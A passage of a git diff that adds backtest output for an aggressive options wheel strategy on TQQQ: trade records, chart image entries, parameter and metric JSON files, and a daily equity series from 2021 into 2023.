5, + "result": "Win" + }, + { + "date": "2026-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.49, + "spot": 49.308475494384766, + "premium": 0.5999675089349967, + "close_cost": 0.029397970472744728, + "pnl": 51.076953846225194, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2026-03-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.72, + "spot": 49.61796569824219, + "premium": 0.5420435636602097, + "close_cost": 0.01943732682159527, + "pnl": 46.280623683861435, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2026-03-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.14, + "spot": 49.308475494384766, + "premium": 0.5493659811993581, + "close_cost": 0.0005038227930661554, + "pnl": 48.90621584062919, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 44.496429443359375, + "premium": 0.4571711027535006, + "close_cost": 0.07888536647135957, + "pnl": 31.8485736282141, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.45, + "spot": 41.68000030517578, + "premium": 0.4899103648679599, + "close_cost": 0.0327598209569977, + "pnl": 39.73505439109623, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.45, + "spot": 48.0, + "premium": 0.7825883684419832, + "close_cost": 0.12738446714410046, + "pnl": 59.540390129788264, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-04-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.62, + "spot": 55.650001525878906, + "premium": 1.0000270235383653, + "close_cost": 0.12097379471958147, + "pnl": 81.92532288187837, + "hold_days": 2, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..43ecf37 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/equity.png new file mode 100644 index 0000000..5da4d46 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/indicators.png new file mode 100644 index 0000000..9654918 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/monthly.png new file mode 100644 index 0000000..4e84b60 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/meta.json new file mode 100644 index 0000000..5cbb872 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/meta.json @@ -0,0 +1,13 @@ +{ + "start": "2021-04-24", + "end": "2026-04-24", + "style": "aggressive", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 6.0, + "call_otm_pct": 2.0, + "put_tp_pct": 50.0, + "call_tp_pct": 80.0, + "put_sl_pct": null, + "call_sl_pct": null +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/metrics.json new file mode 100644 index 0000000..75e7bcd --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 21.203246816790934, + "final_value": 12120.324681679094, + "cagr": 3.928013990277779, + "sharpe": 0.15407662226007332, + "max_dd": -12.80745424951754, + "n_trades": 167, + "wins": 137, + "losses": 30, + "win_rate": 82.03592814371258, + "avg_win": 40.5684761051716, + "avg_loss": -146.16866231788606, + "chain_quotes": 0, + "bs_quotes": 649 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/series.json b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/series.json new file mode 100644 index 0000000..89288d8 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/series.json @@ -0,0 +1,30376 @@ +{ + "equity": [ + [ + "2021-04-26", + 9998.183037138344 + ], + [ + "2021-04-27", + 9996.393335929548 + ], + [ + "2021-04-28", + 9996.650984101701 + ], + [ + "2021-04-29", + 10012.279067433305 + ], + [ + "2021-04-30", + 10008.431656953162 + ], + [ + "2021-05-03", + 10036.722399731885 + ], + [ + "2021-05-04", + 9999.264962217836 + ], + [ + "2021-05-05", + 9994.518133659587 + ], + [ + "2021-05-06", + 10026.858512304307 + ], + [ + "2021-05-07", + 10055.166517547457 + ], + [ + "2021-05-10", + 9991.842191151842 + ], + [ + "2021-05-11", + 9992.658276186155 + ], + [ + "2021-05-12", + 9862.470678072923 + ], + [ + "2021-05-13", + 9892.530119205883 + ], + [ + "2021-05-14", + 9946.34968432203 + ], + [ + "2021-05-17", + 9958.801422158806 + ], + [ + "2021-05-18", + 9959.854817256008 + ], + [ + "2021-05-19", + 9969.006054945357 + ], + [ + "2021-05-20", + 9991.035005218499 + ], + [ + "2021-05-21", + 9992.20699072966 + ], + [ + "2021-05-24", + 9993.379113719076 + ], + [ + "2021-05-25", + 9994.55137420287 + ], + [ + "2021-05-26", + 9992.733772197174 + ], + [ + "2021-05-27", + 9992.244925657757 + ], + [ + "2021-05-28", + 10005.201121829492 + ], + [ + "2021-06-01", + 10025.827957587948 + ], + [ + "2021-06-02", + 10027.004024441638 + ], + [ + "2021-06-03", + 10025.190229252337 + ], + [ + "2021-06-04", + 10044.647473143086 + ], + [ + "2021-06-07", + 10045.825747595843 + ], + [ + "2021-06-08", + 10047.00416026457 + ], + [ + "2021-06-09", + 10048.18271116548 + ], + [ + "2021-06-10", + 10049.361400314787 + ], + [ + "2021-06-11", + 10050.540227728708 + ], + [ + "2021-06-14", + 10051.719193423463 + ], + [ + "2021-06-15", + 10052.898297415273 + ], + [ + "2021-06-16", + 10054.07753972036 + ], + [ + "2021-06-17", + 10055.256920354948 + ], + [ + "2021-06-18", + 10056.436439335266 + ], + [ + "2021-06-21", + 10057.61609667754 + ], + [ + "2021-06-22", + 10058.795892398002 + ], + [ + "2021-06-23", + 10059.975826512884 + ], + [ + "2021-06-24", + 10061.155899038418 + ], + [ + "2021-06-25", + 10062.336109990843 + ], + [ + "2021-06-28", + 10063.516459386396 + ], + [ + "2021-06-29", + 10064.696947241317 + ], + [ + "2021-06-30", + 10065.877573571846 + ], + [ + "2021-07-01", + 10067.058338394228 + ], + [ + "2021-07-02", + 10068.23924172471 + ], + [ + "2021-07-06", + 10069.420283579539 + ], + [ + "2021-07-07", + 10070.601463974963 + ], + [ + "2021-07-08", + 10071.782782927234 + ], + [ + "2021-07-09", + 10072.964240452606 + ], + [ + "2021-07-12", + 10074.145836567332 + ], + [ + "2021-07-13", + 10075.327571287671 + ], + [ + "2021-07-14", + 10076.509444629883 + ], + [ + "2021-07-15", + 10077.691456610226 + ], + [ + "2021-07-16", + 10078.873607244965 + ], + [ + "2021-07-19", + 10080.055896550362 + ], + [ + "2021-07-20", + 10081.238324542686 + ], + [ + "2021-07-21", + 10082.420891238206 + ], + [ + "2021-07-22", + 10083.603596653189 + ], + [ + "2021-07-23", + 10084.786440803911 + ], + [ + "2021-07-26", + 10085.969423706645 + ], + [ + "2021-07-27", + 10087.152545377667 + ], + [ + "2021-07-28", + 10088.335805833254 + ], + [ + "2021-07-29", + 10089.519205089688 + ], + [ + "2021-07-30", + 10090.702743163249 + ], + [ + "2021-08-02", + 10091.886420070221 + ], + [ + "2021-08-03", + 10093.07023582689 + ], + [ + "2021-08-04", + 10094.254190449545 + ], + [ + "2021-08-05", + 10095.438283954474 + ], + [ + "2021-08-06", + 10096.62251635797 + ], + [ + "2021-08-09", + 10097.806887676323 + ], + [ + "2021-08-10", + 10098.99139792583 + ], + [ + "2021-08-11", + 10100.17604712279 + ], + [ + "2021-08-12", + 10101.3608352835 + ], + [ + "2021-08-13", + 10102.54576242426 + ], + [ + "2021-08-16", + 10103.730828561376 + ], + [ + "2021-08-17", + 10104.91603371115 + ], + [ + "2021-08-18", + 10106.101377889889 + ], + [ + "2021-08-19", + 10107.286861113902 + ], + [ + "2021-08-20", + 10108.4724833995 + ], + [ + "2021-08-23", + 10109.658244762997 + ], + [ + "2021-08-24", + 10110.844145220704 + ], + [ + "2021-08-25", + 10112.03018478894 + ], + [ + "2021-08-26", + 10113.216363484022 + ], + [ + "2021-08-27", + 10114.40268132227 + ], + [ + "2021-08-30", + 10115.589138320007 + ], + [ + "2021-08-31", + 10116.775734493554 + ], + [ + "2021-09-01", + 10117.962469859242 + ], + [ + "2021-09-02", + 10119.149344433394 + ], + [ + "2021-09-03", + 10120.336358232342 + ], + [ + "2021-09-07", + 10121.523511272417 + ], + [ + "2021-09-08", + 10122.710803569951 + ], + [ + "2021-09-09", + 10123.898235141281 + ], + [ + "2021-09-10", + 10125.085806002746 + ], + [ + "2021-09-13", + 10126.273516170682 + ], + [ + "2021-09-14", + 10127.461365661433 + ], + [ + "2021-09-15", + 10128.64935449134 + ], + [ + "2021-09-16", + 10129.837482676749 + ], + [ + "2021-09-17", + 10131.025750234006 + ], + [ + "2021-09-20", + 10129.224157179462 + ], + [ + "2021-09-21", + 10137.412589838526 + ], + [ + "2021-09-22", + 10141.509090758916 + ], + [ + "2021-09-23", + 10142.698727439149 + ], + [ + "2021-09-24", + 10143.88850366818 + ], + [ + "2021-09-27", + 10142.088419462383 + ], + [ + "2021-09-28", + 10033.507609970486 + ], + [ + "2021-09-29", + 10027.395876441207 + ], + [ + "2021-09-30", + 10009.629330448915 + ], + [ + "2021-10-01", + 10056.730712805556 + ], + [ + "2021-10-04", + 9894.260835562469 + ], + [ + "2021-10-05", + 9949.777614326953 + ], + [ + "2021-10-06", + 9975.702492288385 + ], + [ + "2021-10-07", + 9998.890789343814 + ], + [ + "2021-10-08", + 9998.825899556905 + ], + [ + "2021-10-11", + 10014.227930376059 + ], + [ + "2021-10-12", + 10014.027952279483 + ], + [ + "2021-10-13", + 10030.590613909753 + ], + [ + "2021-10-14", + 10031.767239440718 + ], + [ + "2021-10-15", + 10032.944002994227 + ], + [ + "2021-10-18", + 10031.130904586471 + ], + [ + "2021-10-19", + 10050.101914308116 + ], + [ + "2021-10-20", + 10052.597071367705 + ], + [ + "2021-10-21", + 10053.776278337858 + ], + [ + "2021-10-22", + 10054.955623633368 + ], + [ + "2021-10-25", + 10053.145107270462 + ], + [ + "2021-10-26", + 10076.606928453772 + ], + [ + "2021-10-27", + 10077.78895186933 + ], + [ + "2021-10-28", + 10078.971113940624 + ], + [ + "2021-10-29", + 10080.15341468392 + ], + [ + "2021-11-01", + 10081.335854115483 + ], + [ + "2021-11-02", + 10082.518432251583 + ], + [ + "2021-11-03", + 10083.70114910849 + ], + [ + "2021-11-04", + 10084.884004702477 + ], + [ + "2021-11-05", + 10086.066999049817 + ], + [ + "2021-11-08", + 10087.25013216679 + ], + [ + "2021-11-09", + 10088.43340406967 + ], + [ + "2021-11-10", + 10086.62681477474 + ], + [ + "2021-11-11", + 10094.75404131205 + ], + [ + "2021-11-12", + 10095.93819345134 + ], + [ + "2021-11-15", + 10097.122484496076 + ], + [ + "2021-11-16", + 10098.30691446255 + ], + [ + "2021-11-17", + 10099.491483367055 + ], + [ + "2021-11-18", + 10100.676191225893 + ], + [ + "2021-11-19", + 10101.861038055364 + ], + [ + "2021-11-22", + 10100.056023871768 + ], + [ + "2021-11-23", + 10095.74131088797 + ], + [ + "2021-11-24", + 10106.077061994063 + ], + [ + "2021-11-26", + 10054.751955214762 + ], + [ + "2021-11-29", + 10112.81926076265 + ], + [ + "2021-11-30", + 10066.521086159186 + ], + [ + "2021-12-01", + 9964.07840057923 + ], + [ + "2021-12-02", + 10021.111434495022 + ], + [ + "2021-12-03", + 9888.737588535727 + ], + [ + "2021-12-06", + 9979.976346542717 + ], + [ + "2021-12-07", + 10095.232842466137 + ], + [ + "2021-12-08", + 10115.876202220083 + ], + [ + "2021-12-09", + 10088.57102165182 + ], + [ + "2021-12-10", + 10126.663676347333 + ], + [ + "2021-12-13", + 10145.753288671964 + ], + [ + "2021-12-14", + 10121.071061577515 + ], + [ + "2021-12-15", + 10180.48006669009 + ], + [ + "2021-12-16", + 10181.67427481053 + ], + [ + "2021-12-17", + 10182.868623016018 + ], + [ + "2021-12-20", + 10181.073111322987 + ], + [ + "2021-12-21", + 10226.474168994831 + ], + [ + "2021-12-22", + 10227.673772394286 + ], + [ + "2021-12-23", + 10228.873516511676 + ], + [ + "2021-12-27", + 10227.083401363505 + ], + [ + "2021-12-28", + 10232.795281447976 + ], + [ + "2021-12-29", + 10249.019879543757 + ], + [ + "2021-12-30", + 10257.87625940994 + ], + [ + "2021-12-31", + 10249.572303958152 + ], + [ + "2022-01-03", + 10323.803615570263 + ], + [ + "2022-01-04", + 10281.387910921365 + ], + [ + "2022-01-05", + 10085.000153547773 + ], + [ + "2022-01-06", + 10088.818311886816 + ], + [ + "2022-01-07", + 9996.345941071884 + ], + [ + "2022-01-10", + 10013.300314359753 + ], + [ + "2022-01-11", + 10094.967988898914 + ], + [ + "2022-01-12", + 10123.851707680049 + ], + [ + "2022-01-13", + 10006.518503905534 + ], + [ + "2022-01-14", + 10060.970220509564 + ], + [ + "2022-01-18", + 9861.44032549656 + ], + [ + "2022-01-19", + 9802.55714170989 + ], + [ + "2022-01-20", + 9718.53916371304 + ], + [ + "2022-01-21", + 9538.7120185556 + ], + [ + "2022-01-24", + 9589.12242665832 + ], + [ + "2022-01-25", + 9451.505510383437 + ], + [ + "2022-01-26", + 9456.648396612527 + ], + [ + "2022-01-27", + 9416.835962997746 + ], + [ + "2022-01-28", + 9529.65058207408 + ], + [ + "2022-01-31", + 9584.941427245181 + ], + [ + "2022-02-01", + 9583.262873014506 + ], + [ + "2022-02-02", + 9612.477490685225 + ], + [ + "2022-02-03", + 9468.24699759447 + ], + [ + "2022-02-04", + 9533.940254613028 + ], + [ + "2022-02-07", + 9555.787433804768 + ], + [ + "2022-02-08", + 9666.32200762185 + ], + [ + "2022-02-09", + 9713.591596970999 + ], + [ + "2022-02-10", + 9714.731037339994 + ], + [ + "2022-02-11", + 9715.870611369577 + ], + [ + "2022-02-14", + 9717.010319075425 + ], + [ + "2022-02-15", + 9715.16016047322 + ], + [ + "2022-02-16", + 9728.30150809374 + ], + [ + "2022-02-17", + 9633.081747895347 + ], + [ + "2022-02-18", + 9599.05529429155 + ], + [ + "2022-02-22", + 9576.339838632133 + ], + [ + "2022-02-23", + 9475.98782255799 + ], + [ + "2022-02-24", + 9608.758745269417 + ], + [ + "2022-02-25", + 9670.24701553657 + ], + [ + "2022-02-28", + 9736.28322803642 + ], + [ + "2022-03-01", + 9748.25380949023 + ], + [ + "2022-03-02", + 9810.235599614074 + ], + [ + "2022-03-03", + 9775.549185843993 + ], + [ + "2022-03-04", + 9735.807316537308 + ], + [ + "2022-03-07", + 9520.456589434496 + ], + [ + "2022-03-08", + 9515.21964531709 + ], + [ + "2022-03-09", + 9608.111631226013 + ], + [ + "2022-03-10", + 9600.735343049639 + ], + [ + "2022-03-11", + 9552.68681326528 + ], + [ + "2022-03-14", + 9487.99467002336 + ], + [ + "2022-03-15", + 9561.29698619133 + ], + [ + "2022-03-16", + 9610.222456113894 + ], + [ + "2022-03-17", + 9621.66959312182 + ], + [ + "2022-03-18", + 9628.931000336575 + ], + [ + "2022-03-21", + 9627.98217928304 + ], + [ + "2022-03-22", + 9677.508487149737 + ], + [ + "2022-03-23", + 9666.534619217882 + ], + [ + "2022-03-24", + 9708.647281943548 + ], + [ + "2022-03-25", + 9709.786142326027 + ], + [ + "2022-03-28", + 9707.935136301061 + ], + [ + "2022-03-29", + 9759.461072052198 + ], + [ + "2022-03-30", + 9751.411132906162 + ], + [ + "2022-03-31", + 9730.909099074768 + ], + [ + "2022-04-01", + 9746.223410729028 + ], + [ + "2022-04-04", + 9811.403060545254 + ], + [ + "2022-04-05", + 9740.2388379163 + ], + [ + "2022-04-06", + 9648.41751431126 + ], + [ + "2022-04-07", + 9674.00676373896 + ], + [ + "2022-04-08", + 9602.436304143896 + ], + [ + "2022-04-11", + 9437.669680893416 + ], + [ + "2022-04-12", + 9438.571502712774 + ], + [ + "2022-04-13", + 9524.198237920746 + ], + [ + "2022-04-14", + 9448.329645669952 + ], + [ + "2022-04-18", + 9496.21600877591 + ], + [ + "2022-04-19", + 9563.359234170981 + ], + [ + "2022-04-20", + 9531.78373783242 + ], + [ + "2022-04-21", + 9458.910914992066 + ], + [ + "2022-04-22", + 9312.410333842521 + ], + [ + "2022-04-25", + 9371.27424369671 + ], + [ + "2022-04-26", + 9222.040315196315 + ], + [ + "2022-04-27", + 9230.129937276422 + ], + [ + "2022-04-28", + 9302.222402281697 + ], + [ + "2022-04-29", + 9185.672815485912 + ], + [ + "2022-05-02", + 9279.284566702905 + ], + [ + "2022-05-03", + 9309.409532574316 + ], + [ + "2022-05-04", + 9383.685909508009 + ], + [ + "2022-05-05", + 9242.058444271472 + ], + [ + "2022-05-06", + 9208.237525003675 + ], + [ + "2022-05-09", + 9033.56758721728 + ], + [ + "2022-05-10", + 9066.160403135873 + ], + [ + "2022-05-11", + 9001.587190696064 + ], + [ + "2022-05-12", + 9005.898206435637 + ], + [ + "2022-05-13", + 9097.166838809695 + ], + [ + "2022-05-16", + 9137.489596754796 + ], + [ + "2022-05-17", + 9193.435480438784 + ], + [ + "2022-05-18", + 9080.04177495244 + ], + [ + "2022-05-19", + 9070.524555243173 + ], + [ + "2022-05-20", + 9065.660791646642 + ], + [ + "2022-05-23", + 9122.822491493893 + ], + [ + "2022-05-24", + 9095.980280197704 + ], + [ + "2022-05-25", + 9136.459699948877 + ], + [ + "2022-05-26", + 9187.339131188646 + ], + [ + "2022-05-27", + 9193.347234558105 + ], + [ + "2022-05-31", + 9231.587626119499 + ], + [ + "2022-06-01", + 9233.93757417077 + ], + [ + "2022-06-02", + 9272.343251453878 + ], + [ + "2022-06-03", + 9270.44093175322 + ], + [ + "2022-06-06", + 9302.121792261532 + ], + [ + "2022-06-07", + 9321.670854032203 + ], + [ + "2022-06-08", + 9322.764320642524 + ], + [ + "2022-06-09", + 9323.857915520539 + ], + [ + "2022-06-10", + 9321.961638681294 + ], + [ + "2022-06-13", + 9252.799606400305 + ], + [ + "2022-06-14", + 9265.949439669366 + ], + [ + "2022-06-15", + 9327.313260374262 + ], + [ + "2022-06-16", + 9223.060289741257 + ], + [ + "2022-06-17", + 9260.245802898418 + ], + [ + "2022-06-21", + 9320.874600653127 + ], + [ + "2022-06-22", + 9330.229308789738 + ], + [ + "2022-06-23", + 9349.651802375429 + ], + [ + "2022-06-24", + 9351.149818017822 + ], + [ + "2022-06-27", + 9365.988747703921 + ], + [ + "2022-06-28", + 9317.266499480915 + ], + [ + "2022-06-29", + 9329.120946150526 + ], + [ + "2022-06-30", + 9305.52529801883 + ], + [ + "2022-07-01", + 9325.680148877284 + ], + [ + "2022-07-05", + 9382.315087641971 + ], + [ + "2022-07-06", + 9400.25256076454 + ], + [ + "2022-07-07", + 9420.739086673148 + ], + [ + "2022-07-08", + 9420.621761572502 + ], + [ + "2022-07-11", + 9410.026123982547 + ], + [ + "2022-07-12", + 9403.34207501903 + ], + [ + "2022-07-13", + 9413.682299596328 + ], + [ + "2022-07-14", + 9432.890776548495 + ], + [ + "2022-07-15", + 9476.892330758728 + ], + [ + "2022-07-18", + 9490.982046125098 + ], + [ + "2022-07-19", + 9510.690411784002 + ], + [ + "2022-07-20", + 9511.806051090434 + ], + [ + "2022-07-21", + 9512.9218212655 + ], + [ + "2022-07-22", + 9511.04772232455 + ], + [ + "2022-07-25", + 9525.682928976103 + ], + [ + "2022-07-26", + 9496.608964872568 + ], + [ + "2022-07-27", + 9544.62674240644 + ], + [ + "2022-07-28", + 9545.74636257049 + ], + [ + "2022-07-29", + 9543.87611407014 + ], + [ + "2022-08-01", + 9560.257758256374 + ], + [ + "2022-08-02", + 9564.406057546448 + ], + [ + "2022-08-03", + 9581.65259608739 + ], + [ + "2022-08-04", + 9582.776559521582 + ], + [ + "2022-08-05", + 9583.90065480086 + ], + [ + "2022-08-08", + 9582.034881940688 + ], + [ + "2022-08-09", + 9569.15631417425 + ], + [ + "2022-08-10", + 9604.492650653458 + ], + [ + "2022-08-11", + 9605.619293310874 + ], + [ + "2022-08-12", + 9606.746068127659 + ], + [ + "2022-08-15", + 9607.872975119315 + ], + [ + "2022-08-16", + 9609.000014301346 + ], + [ + "2022-08-17", + 9607.137185689258 + ], + [ + "2022-08-18", + 9617.53741602836 + ], + [ + "2022-08-19", + 9588.3496833481 + ], + [ + "2022-08-22", + 9524.950297438636 + ], + [ + "2022-08-23", + 9527.841874347894 + ], + [ + "2022-08-24", + 9539.562405344383 + ], + [ + "2022-08-25", + 9581.178114404664 + ], + [ + "2022-08-26", + 9460.753594933263 + ], + [ + "2022-08-29", + 9426.02842011591 + ], + [ + "2022-08-30", + 9403.81999888883 + ], + [ + "2022-08-31", + 9396.436052817266 + ], + [ + "2022-09-01", + 9403.038228155012 + ], + [ + "2022-09-02", + 9353.889495881505 + ], + [ + "2022-09-06", + 9356.713592570684 + ], + [ + "2022-09-07", + 9404.164204365636 + ], + [ + "2022-09-08", + 9423.419649928472 + ], + [ + "2022-09-09", + 9429.394985993136 + ], + [ + "2022-09-12", + 9451.17732181712 + ], + [ + "2022-09-13", + 9452.285980017077 + ], + [ + "2022-09-14", + 9453.394768266759 + ], + [ + "2022-09-15", + 9454.50368658142 + ], + [ + "2022-09-16", + 9452.622734976318 + ], + [ + "2022-09-19", + 9471.68170913089 + ], + [ + "2022-09-20", + 9472.792772571629 + ], + [ + "2022-09-21", + 9473.903966344236 + ], + [ + "2022-09-22", + 9475.015290464 + ], + [ + "2022-09-23", + 9473.136744946209 + ], + [ + "2022-09-26", + 9485.397914465544 + ], + [ + "2022-09-27", + 9487.999733513328 + ], + [ + "2022-09-28", + 9489.11271111893 + ], + [ + "2022-09-29", + 9490.225819280939 + ], + [ + "2022-09-30", + 9488.349058014668 + ], + [ + "2022-10-03", + 9506.918565688416 + ], + [ + "2022-10-04", + 9508.033762543293 + ], + [ + "2022-10-05", + 9509.149090214903 + ], + [ + "2022-10-06", + 9510.264548718591 + ], + [ + "2022-10-07", + 9508.390138069704 + ], + [ + "2022-10-10", + 9513.201503491173 + ], + [ + "2022-10-11", + 9509.433795592864 + ], + [ + "2022-10-12", + 9515.093934648674 + ], + [ + "2022-10-13", + 9538.824819542726 + ], + [ + "2022-10-14", + 9536.953759119675 + ], + [ + "2022-10-17", + 9555.746116452123 + ], + [ + "2022-10-18", + 9556.867040960042 + ], + [ + "2022-10-19", + 9557.98809695657 + ], + [ + "2022-10-20", + 9559.109284457129 + ], + [ + "2022-10-21", + 9557.240603477145 + ], + [ + "2022-10-24", + 9575.71045197284 + ], + [ + "2022-10-25", + 9576.83371837146 + ], + [ + "2022-10-26", + 9577.9571165334 + ], + [ + "2022-10-27", + 9579.080646474116 + ], + [ + "2022-10-28", + 9577.214308209068 + ], + [ + "2022-10-31", + 9581.286261438203 + ], + [ + "2022-11-01", + 9577.128141296418 + ], + [ + "2022-11-02", + 9510.428139167221 + ], + [ + "2022-11-03", + 9464.664110352722 + ], + [ + "2022-11-04", + 9500.966143161675 + ], + [ + "2022-11-07", + 9528.060368805469 + ], + [ + "2022-11-08", + 9542.310001979613 + ], + [ + "2022-11-09", + 9517.245274063183 + ], + [ + "2022-11-10", + 9566.330747247388 + ], + [ + "2022-11-11", + 9564.849257624688 + ], + [ + "2022-11-14", + 9575.736595133798 + ], + [ + "2022-11-15", + 9594.051565179458 + ], + [ + "2022-11-16", + 9595.176983058773 + ], + [ + "2022-11-17", + 9596.302532953785 + ], + [ + "2022-11-18", + 9594.43821487998 + ], + [ + "2022-11-21", + 9601.292348498597 + ], + [ + "2022-11-22", + 9620.071870809154 + ], + [ + "2022-11-23", + 9621.200340966954 + ], + [ + "2022-11-25", + 9619.338943498495 + ], + [ + "2022-11-28", + 9621.245265233443 + ], + [ + "2022-11-29", + 9618.155650413406 + ], + [ + "2022-11-30", + 9658.085415687541 + ], + [ + "2022-12-01", + 9659.218344975332 + ], + [ + "2022-12-02", + 9657.361407159935 + ], + [ + "2022-12-05", + 9652.8540363816 + ], + [ + "2022-12-06", + 9622.537101793492 + ], + [ + "2022-12-07", + 9622.27588758778 + ], + [ + "2022-12-08", + 9658.348411899711 + ], + [ + "2022-12-09", + 9649.71420882939 + ], + [ + "2022-12-12", + 9680.721494169244 + ], + [ + "2022-12-13", + 9696.851764813628 + ], + [ + "2022-12-14", + 9695.758665363155 + ], + [ + "2022-12-15", + 9624.942109974612 + ], + [ + "2022-12-16", + 9612.639609865599 + ], + [ + "2022-12-19", + 9588.587950291014 + ], + [ + "2022-12-20", + 9591.002866562872 + ], + [ + "2022-12-21", + 9613.874025148456 + ], + [ + "2022-12-22", + 9582.467907349597 + ], + [ + "2022-12-23", + 9588.960038449975 + ], + [ + "2022-12-27", + 9559.888109649502 + ], + [ + "2022-12-28", + 9543.874658096458 + ], + [ + "2022-12-29", + 9584.969586996189 + ], + [ + "2022-12-30", + 9589.298158579837 + ], + [ + "2023-01-03", + 9595.659442302218 + ], + [ + "2023-01-04", + 9606.133669539191 + ], + [ + "2023-01-05", + 9587.137904486215 + ], + [ + "2023-01-06", + 9621.949418336204 + ], + [ + "2023-01-09", + 9641.002925503124 + ], + [ + "2023-01-10", + 9645.221051172848 + ], + [ + "2023-01-11", + 9646.352471422904 + ], + [ + "2023-01-12", + 9647.484024392757 + ], + [ + "2023-01-13", + 9648.615710097978 + ], + [ + "2023-01-17", + 9649.747528554133 + ], + [ + "2023-01-18", + 9650.879479776797 + ], + [ + "2023-01-19", + 9652.011563781543 + ], + [ + "2023-01-20", + 9653.143780583949 + ], + [ + "2023-01-23", + 9654.276130199589 + ], + [ + "2023-01-24", + 9655.408612644045 + ], + [ + "2023-01-25", + 9656.541227932898 + ], + [ + "2023-01-26", + 9657.673976081729 + ], + [ + "2023-01-27", + 9658.806857106125 + ], + [ + "2023-01-30", + 9659.939871021674 + ], + [ + "2023-01-31", + 9661.073017843963 + ], + [ + "2023-02-01", + 9662.206297588582 + ], + [ + "2023-02-02", + 9663.339710271124 + ], + [ + "2023-02-03", + 9664.473255907184 + ], + [ + "2023-02-06", + 9665.606934512356 + ], + [ + "2023-02-07", + 9666.740746102238 + ], + [ + "2023-02-08", + 9664.88469069243 + ], + [ + "2023-02-09", + 9659.307321624907 + ], + [ + "2023-02-10", + 9654.953348823099 + ], + [ + "2023-02-13", + 9685.588379683304 + ], + [ + "2023-02-14", + 9686.724535170913 + ], + [ + "2023-02-15", + 9684.870823933781 + ], + [ + "2023-02-16", + 9661.901094265288 + ], + [ + "2023-02-17", + 9656.907633802957 + ], + [ + "2023-02-21", + 9614.480635635426 + ], + [ + "2023-02-22", + 9614.064174599813 + ], + [ + "2023-02-23", + 9632.350868501608 + ], + [ + "2023-02-24", + 9607.268196642583 + ], + [ + "2023-02-27", + 9638.442818324183 + ], + [ + "2023-02-28", + 9638.085995393156 + ], + [ + "2023-03-01", + 9628.328757378453 + ], + [ + "2023-03-02", + 9650.195024424202 + ], + [ + "2023-03-03", + 9687.50298473557 + ], + [ + "2023-03-06", + 9703.043103346907 + ], + [ + "2023-03-07", + 9700.758789826858 + ], + [ + "2023-03-08", + 9715.932186192591 + ], + [ + "2023-03-09", + 9682.73889834909 + ], + [ + "2023-03-10", + 9642.657809664175 + ], + [ + "2023-03-13", + 9663.955723299401 + ], + [ + "2023-03-14", + 9687.88506985661 + ], + [ + "2023-03-15", + 9692.762780610683 + ], + [ + "2023-03-16", + 9695.282909812968 + ], + [ + "2023-03-17", + 9696.384900623645 + ], + [ + "2023-03-20", + 9697.522322583256 + ], + [ + "2023-03-21", + 9698.659877966687 + ], + [ + "2023-03-22", + 9699.79756678959 + ], + [ + "2023-03-23", + 9700.935389067618 + ], + [ + "2023-03-24", + 9702.073344816423 + ], + [ + "2023-03-27", + 9703.211434051664 + ], + [ + "2023-03-28", + 9704.349656789 + ], + [ + "2023-03-29", + 9705.488013044089 + ], + [ + "2023-03-30", + 9706.626502832594 + ], + [ + "2023-03-31", + 9707.765126170181 + ], + [ + "2023-04-03", + 9708.903883072513 + ], + [ + "2023-04-04", + 9710.042773555258 + ], + [ + "2023-04-05", + 9711.181797634088 + ], + [ + "2023-04-06", + 9712.320955324672 + ], + [ + "2023-04-10", + 9713.460246642684 + ], + [ + "2023-04-11", + 9714.599671603799 + ], + [ + "2023-04-12", + 9715.739230223693 + ], + [ + "2023-04-13", + 9716.878922518046 + ], + [ + "2023-04-14", + 9718.018748502538 + ], + [ + "2023-04-17", + 9719.15870819285 + ], 